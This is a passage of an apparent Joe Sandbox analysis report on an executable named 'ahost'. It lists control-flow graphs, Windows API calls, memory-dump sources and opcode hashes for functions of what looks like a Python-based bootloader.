782->789 786 7ff7f91fbe21-7ff7f91fbe33 783->786 787 7ff7f91fbe9b-7ff7f91fbea8 call 7ff7f91fb524 783->787 790 7ff7f91fbe35 786->790 791 7ff7f91fbe8e-7ff7f91fbe96 786->791 787->789 789->756 792 7ff7f91fbe3a-7ff7f91fbe41 790->792 791->756 794 7ff7f91fbe43-7ff7f91fbe47 792->794 795 7ff7f91fbe7d-7ff7f91fbe88 792->795 796 7ff7f91fbe63 794->796 797 7ff7f91fbe49-7ff7f91fbe50 794->797 795->791 799 7ff7f91fbe69-7ff7f91fbe79 796->799 797->796 798 7ff7f91fbe52-7ff7f91fbe56 797->798 798->796 800 7ff7f91fbe58-7ff7f91fbe61 798->800 799->792 801 7ff7f91fbe7b 799->801 800->799 801->791
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
                                                                                                                                                                                                                              • Instruction ID: 9884b20202ac9e5118205879b2a86619ab924cd8e6f72585e4f3ceca5fcae30c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35C1D522E4868A41F770AF15A8402BDA771EB81B88FD54131EB7E037D9EF7CE45583A0

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                              • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                              • Opcode ID: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                                              • Instruction ID: 402d2aa6ff56c8e95c932c549241a57d5b5cb113419b88899dc7a8fd74ebe2e2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0413961E0868692EB15FF24F8142E9A371BB54380FC00132EA6D436D9EE3CF615C3A1

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279662727-0
                                                                                                                                                                                                                              • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                              • Instruction ID: 5b99d0963e6d5cbf6175fddd5112a3b6e5f3c26b27ac0fc5bf3803346ebff192
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3941A622D1878583F750AF20A914379A670FB94758F908335E77C03AD9EF7CA5E087A0

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3251591375-0
                                                                                                                                                                                                                              • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                              • Instruction ID: 559177495319094697045fd01ce889ceb8905b357269d72fbb773dcead9883eb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79312B24E0814646FB64BF24BC213B9A6B1AF41384FC44434EA3E472DFDE2DB50582F2

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 962 7ff7f91f01ac-7ff7f91f01d9 963 7ff7f91f01f5 962->963 964 7ff7f91f01db-7ff7f91f01de 962->964 965 7ff7f91f01f7-7ff7f91f020b 963->965 964->963 966 7ff7f91f01e0-7ff7f91f01e3 964->966 967 7ff7f91f01e5-7ff7f91f01ea call 7ff7f91f4f78 966->967 968 7ff7f91f020c-7ff7f91f020f 966->968 978 7ff7f91f01f0 call 7ff7f91fa950 967->978 970 7ff7f91f0211-7ff7f91f021d 968->970 971 7ff7f91f021f-7ff7f91f0223 968->971 970->971 973 7ff7f91f024a-7ff7f91f0253 970->973 974 7ff7f91f0225-7ff7f91f022f call 7ff7f920a540 971->974 975 7ff7f91f0237-7ff7f91f023a 971->975 976 7ff7f91f0255-7ff7f91f0258 973->976 977 7ff7f91f025a 973->977 974->975 975->967 980 7ff7f91f023c-7ff7f91f0248 975->980 981 7ff7f91f025f-7ff7f91f027e 976->981 977->981 978->963 980->967 980->973 984 7ff7f91f03c5-7ff7f91f03c8 981->984 985 7ff7f91f0284-7ff7f91f0292 981->985 984->965 986 7ff7f91f0294-7ff7f91f029b 985->986 987 7ff7f91f030a-7ff7f91f030f 985->987 986->987 988 7ff7f91f029d 986->988 989 7ff7f91f0311-7ff7f91f031d 987->989 990 7ff7f91f037c-7ff7f91f037f call 7ff7f91fbf1c 987->990 992 7ff7f91f02a3-7ff7f91f02ad 988->992 993 7ff7f91f03f0 988->993 994 7ff7f91f031f-7ff7f91f0326 989->994 995 7ff7f91f0329-7ff7f91f032f 989->995 996 7ff7f91f0384-7ff7f91f0387 990->996 997 7ff7f91f02b3-7ff7f91f02b9 992->997 998 7ff7f91f03cd-7ff7f91f03d1 992->998 1000 7ff7f91f03f5-7ff7f91f0400 993->1000 994->995 995->998 999 7ff7f91f0335-7ff7f91f0352 call 7ff7f91fa4ec call 7ff7f91fbacc 995->999 996->1000 1001 7ff7f91f0389-7ff7f91f038c 996->1001 1002 7ff7f91f02f1-7ff7f91f0305 997->1002 1003 7ff7f91f02bb-7ff7f91f02be 997->1003 1004 7ff7f91f03d3-7ff7f91f03db call 7ff7f920a540 998->1004 1005 7ff7f91f03e0-7ff7f91f03eb call 7ff7f91f4f78 998->1005 1022 7ff7f91f0357-7ff7f91f0359 999->1022 1000->965 1001->998 1007 7ff7f91f038e-7ff7f91f03a5 1001->1007 1008 7ff7f91f03ac-7ff7f91f03b7 1002->1008 1009 7ff7f91f02c0-7ff7f91f02c6 1003->1009 1010 7ff7f91f02dc-7ff7f91f02e7 call 7ff7f91f4f78 call 7ff7f91fa950 1003->1010 1004->1005 1005->978 1007->1008 1008->985 1015 7ff7f91f03bd 1008->1015 1016 7ff7f91f02d2-7ff7f91f02d7 call 7ff7f920a540 1009->1016 1017 7ff7f91f02c8-7ff7f91f02d0 call 7ff7f9209ea0 1009->1017 1028 7ff7f91f02ec 1010->1028 1015->984 1016->1010 1017->1028 1026 7ff7f91f0405-7ff7f91f040a 1022->1026 1027 7ff7f91f035f 1022->1027 1026->1000 1027->993 1029 7ff7f91f0365-7ff7f91f037a 1027->1029 1028->1002 1029->1008
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                              • Instruction ID: c96c9b31988018986e1f3885fe58d5b314b84a6d3d30878889b1be9de6293051
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9051D861F0964946FB64AE25AC0067AE6A1AF44BACF944734DF7D437CDEF3CD4018AA0

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                              • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                              • Instruction ID: 8e14470d234dd54ed00dc2bd32ee21cadaa43b285cb6f706435381aa38cd5bae
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F11E261A18A4581EB20AF25BC14169A371AB41BF8FA40331EE7E4B7ECDF3CD0118780
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00007FF7F91FAA45,?,?,00000000,00007FF7F91FAAFA), ref: 00007FF7F91FAC36
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF7F91FAA45,?,?,00000000,00007FF7F91FAAFA), ref: 00007FF7F91FAC40
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 918212764-0
                                                                                                                                                                                                                              • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                              • Instruction ID: 2a21e30385b3368fc9d2ce6c3d3da71baf87aa466c829b30c2c42fa73aca0d4c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8521B321F1C64641FBD4AF21BC9027992A65F847A8F984334DB3E473D9FE6CA4404390
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                              • Instruction ID: f54cd4fd4dadf9e2d986613561f72392da95f41ba0df84fe0a753b136376ff2b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4141A232D0820987FB74AF15F940279B3B4EB55B48F940131D7BD866D9EB2DE4028AA1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 840049012-0
                                                                                                                                                                                                                              • Opcode ID: 7956da3bc7ebdf0e6751cfee80c3b3a7eb40ca053181cf40dfbd3eb0de021786
                                                                                                                                                                                                                              • Instruction ID: 03bbbc4c37ab351b520f6a4c5d1163f782ac27e06166d5ca2fd98c891b0e493a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7956da3bc7ebdf0e6751cfee80c3b3a7eb40ca053181cf40dfbd3eb0de021786
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F221BB21F1865286FB58BE2279043BAD661BF45BD8FCC0070EE6C077CADE3DE44186A1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                              • Instruction ID: ba4f1c134a783ccdc4b500deed89fb48745e438841059c75e2539ea0e805a081
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE317C31E2864A85F761BF55AC4127CAA70AB80B98FC10135EB3D473DAEF7CA45187B0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                              • Instruction ID: 180e1abbd3a409681df0892ecc8f6042999b75a6e9021efee80724af34e77979
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60114F22E1864942FB60BF11B80017DE674AF85B88F8540B1EB7D57ADAEF3ED40087A0
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                              • Instruction ID: 676c7c1d506c1664077f5287841121bc6a905ceb5ea9742d912aa7df9a95cef2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2219572E1864586EBA1AF18E840379B6B0FB84B54F944334E6AD876EDDF3CD4048B50
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                              • Instruction ID: c7da64207e5e993d3a647450791a941979b7ebdfa649c29cd98b28bcb0fc40bc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D018E22E0874941EB05EF52AD01079E6A1BF85FE8B884631EF7C57BDAEE3CE1018750
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F91E45E4,00000000,00007FF7F91E1985), ref: 00007FF7F91E9439
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00007FF7F91E6466,?,00007FF7F91E336E), ref: 00007FF7F91E9092
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
